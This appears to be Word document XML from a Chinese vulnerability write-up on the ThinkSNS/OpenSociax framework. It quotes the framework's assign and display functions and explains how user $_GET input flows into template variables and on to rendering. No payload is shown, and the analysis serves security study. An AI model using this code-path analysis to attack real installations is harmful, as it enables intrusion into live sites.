        <w:pict>
          <v:shape id="_x0000_s4527" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:22.1pt;width:337.5pt;height:33.95pt;z-index:750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"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana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public</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> function assign($name,$value='') {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/>
        </w:rPr>
        <w:t>\core\OpenSociax\Action.class.php assign</w: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group id="_x0000_s4397" style="width:337.75pt;height:181.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6755,3630">
            <v:rect id="_x0000_s4526" style="position:absolute;left:5;top:5;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4525" style="position:absolute;left:185;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4524" style="position:absolute;left:285;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4523" style="position:absolute;left:385;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4522" style="position:absolute;left:485;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4521" style="position:absolute;left:585;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4520" style="position:absolute;left:685;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4519" style="position:absolute;left:785;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4518" style="position:absolute;left:885;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4517" style="position:absolute;left:985;top:248;width:2289;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4516" style="position:absolute;left:3274;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4515" style="position:absolute;left:3395;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4514" style="position:absolute;left:5;top:511;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4513" style="position:absolute;left:185;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4512" style="position:absolute;left:285;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4511" style="position:absolute;left:385;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4510" style="position:absolute;left:485;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4509" style="position:absolute;left:585;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4508" style="position:absolute;left:685;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4507" style="position:absolute;left:785;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4506" style="position:absolute;left:885;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4505" style="position:absolute;left:985;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4504" style="position:absolute;left:1085;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4503" style="position:absolute;left:1185;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4502" style="position:absolute;left:1285;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4501" style="position:absolute;left:1385;top:574;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4500" style="position:absolute;left:2710;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4499" style="position:absolute;left:2810;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4498" style="position:absolute;left:2910;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4497" style="position:absolute;left:3010;top:574;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4496" style="position:absolute;left:3131;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4495" style="position:absolute;left:3231;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4494" style="position:absolute;left:5;top:837;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4493" style="position:absolute;left:185;top:900;width:3735;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4492" style="position:absolute;left:5;top:1163;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4491" style="position:absolute;left:185;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4490" style="position:absolute;left:285;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4489" style="position:absolute;left:385;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4488" style="position:absolute;left:485;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4487" style="position:absolute;left:585;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4486" style="position:absolute;left:685;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4485" style="position:absolute;left:785;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4484" style="position:absolute;left:885;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4483" style="position:absolute;left:985;top:1226;width:3133;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4482" style="position:absolute;left:5;top:1489;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4481" style="position:absolute;left:185;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4480" style="position:absolute;left:285;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4479" style="position:absolute;left:385;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4478" style="position:absolute;left:485;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4477" style="position:absolute;left:585;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4476" style="position:absolute;left:685;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4475" style="position:absolute;left:785;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4474" style="position:absolute;left:885;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4473" style="position:absolute;left:985;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4472" style="position:absolute;left:1085;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4471" style="position:absolute;left:1185;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4470" style="position:absolute;left:1285;top:1552;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4469" style="position:absolute;left:1385;top:1552;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4468" style="position:absolute;left:2951;top:1552;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4467" style="position:absolute;left:3072;top:1552;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4466" style="position:absolute;left:3313;top:1552;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4465" style="position:absolute;left:3433;top:1552;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4464" style="position:absolute;left:3915;top:1552;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4463" style="position:absolute;left:4036;top:1552;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4462" style="position:absolute;left:5;top:1815;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4461" style="position:absolute;left:185;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4460" style="position:absolute;left:285;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4459" style="position:absolute;left:385;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4458" style="position:absolute;left:485;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4457" style="position:absolute;left:585;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4456" style="position:absolute;left:685;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4455" style="position:absolute;left:785;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4454" style="position:absolute;left:885;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4453" style="position:absolute;left:985;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4452" style="position:absolute;left:1085;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4451" style="position:absolute;left:1185;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4450" style="position:absolute;left:1285;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4449" style="position:absolute;left:1385;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4448" style="position:absolute;left:1485;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4447" style="position:absolute;left:1585;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4446" style="position:absolute;left:1685;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4445" style="position:absolute;left:1785;top:1878;width:2048;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4444" style="position:absolute;left:3833;top:1878;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4443" style="position:absolute;left:3954;top:1878;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4442" style="position:absolute;left:4074;top:1878;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4441" style="position:absolute;left:4195;top:1878;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4440" style="position:absolute;left:5;top:2141;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4439" style="position:absolute;left:185;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4438" style="position:absolute;left:285;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4437" style="position:absolute;left:385;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4436" style="position:absolute;left:485;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4435" style="position:absolute;left:585;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4434" style="position:absolute;left:685;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4433" style="position:absolute;left:785;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4432" style="position:absolute;left:885;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4431" style="position:absolute;left:985;top:2204;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4430" style="position:absolute;left:1587;top:2204;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4429" style="position:absolute;left:1708;top:2204;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4428" style="position:absolute;left:5;top:2467;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4427" style="position:absolute;left:185;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4426" style="position:absolute;left:285;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4425" style="position:absolute;left:385;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4424" style="position:absolute;left:485;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4423" style="position:absolute;left:585;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4422" style="position:absolute;left:685;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4421" style="position:absolute;left:785;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4420" style="position:absolute;left:885;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4419" style="position:absolute;left:985;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4418" style="position:absolute;left:1085;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4417" style="position:absolute;left:1185;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4416" style="position:absolute;left:1285;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4415" style="position:absolute;left:1385;top:2530;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4414" style="position:absolute;left:3554;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4413" style="position:absolute;left:3674;top:2530;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4412" style="position:absolute;left:3795;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4411" style="position:absolute;left:3915;top:2530;width:844;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4410" style="position:absolute;left:5;top:2793;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4409" style="position:absolute;left:185;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4408" style="position:absolute;left:285;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4407" style="position:absolute;left:385;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4406" style="position:absolute;left:485;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4405" style="position:absolute;left:585;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4404" style="position:absolute;left:685;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4403" style="position:absolute;left:785;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4402" style="position:absolute;left:885;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4401" style="position:absolute;left:985;top:2856;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4400" style="position:absolute;left:5;top:3119;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4399" type="#_x0000_t75" style="position:absolute;left:185;top:3182;width:520;height:200">
              <v:imagedata r:id="rId60" o:title=""/>
            </v:shape>
            <v:shape id="_x0000_s4398" type="#_x0000_t202" style="position:absolute;left:3;top:3;width:6750;height:3625" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent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80020F">
                    <w:pPr>
                      <w:spacing w:before="1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is_array($name)) {</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:val="left" w:pos="3005"/>
                      </w:tabs>
                      <w:spacing w:before="126" w:line="388" w:lineRule="auto"/>
                      <w:ind w:left="180" w:right="2827" w:firstLine="120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$this-&gt;tVar</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:tab/>
                      <w:t>= array_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merge(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$this-&gt;tVar,$name);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="2" w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="1380" w:right="1855" w:hanging="40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}elseif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(is_object($name)){ foreach($name as $key =&gt;$val)</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="17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$key] = $val;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}else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{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$name] = $value;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124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3"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="34" w:line="309" w:lineRule="auto"/>
        <w:ind w:right="506"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>assign</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-59"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其实就是给模板变量赋值，也就是说我们的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">$_GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后进入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了模板变量中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="417" w:right="317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然后回到一开始的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-61"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">reply </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>函数，可以看到在最后调用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-61"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>display</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="85"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">\core\OpenSociax\functions.inc.php display </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:group id="_x0000_s4374" style="position:absolute;margin-left:80.6pt;margin-top:16.1pt;width:337.75pt;height:148.9pt;z-index:7600;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1612,322" coordsize="6755,2978">
            <v:rect id="_x0000_s4396" style="position:absolute;left:1617;top:327;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4395" style="position:absolute;left:1797;top:540;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4394" style="position:absolute;left:2038;top:540;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4393" style="position:absolute;left:2138;top:540;width:800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4392" style="position:absolute;left:1617;top:833;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4391" style="position:absolute;left:1797;top:896;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4390" style="position:absolute;left:2761;top:896;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4389" style="position:absolute;left:1617;top:1159;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4388" style="position:absolute;left:1797;top:1222;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4387" style="position:absolute;left:1617;top:1485;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4386" style="position:absolute;left:1797;top:1548;width:3374;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4385" style="position:absolute;left:5171;top:1548;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4384" style="position:absolute;left:5291;top:1548;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4383" style="position:absolute;left:1617;top:1811;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4382" type="#_x0000_t75" style="position:absolute;left:1797;top:1874;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4381" style="position:absolute;left:1617;top:2137;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4380" style="position:absolute;left:1797;top:2200;width:6411;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4379" style="position:absolute;left:1617;top:2463;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4378" style="position:absolute;left:1797;top:2526;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4377" style="position:absolute;left:1617;top:2789;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4376" style="position:absolute;left:1797;top:2852;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4375" type="#_x0000_t202" style="position:absolute;left:1614;top:325;width:6750;height:2973" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="12"/>
                      <w:rPr>
                        <w:rFonts w:ascii="宋体"/>
                        <w:sz w:val="13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输出模版</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="112" w:line="391" w:lineRule="auto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display($templateFile='',$tvar=array(),$charset='UTF 8',$contentType='text/html') {</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="12"/>
                      <w:rPr>
                        <w:rFonts w:ascii="宋体"/>
                        <w:sz w:val="24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fetch(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$templateFile,$tvar,$charset,$contentType,true)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;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pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="35"/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rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">fetch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>找到相</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的模板并和我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>提交的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>变</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>量</w:t>
      </w:r>
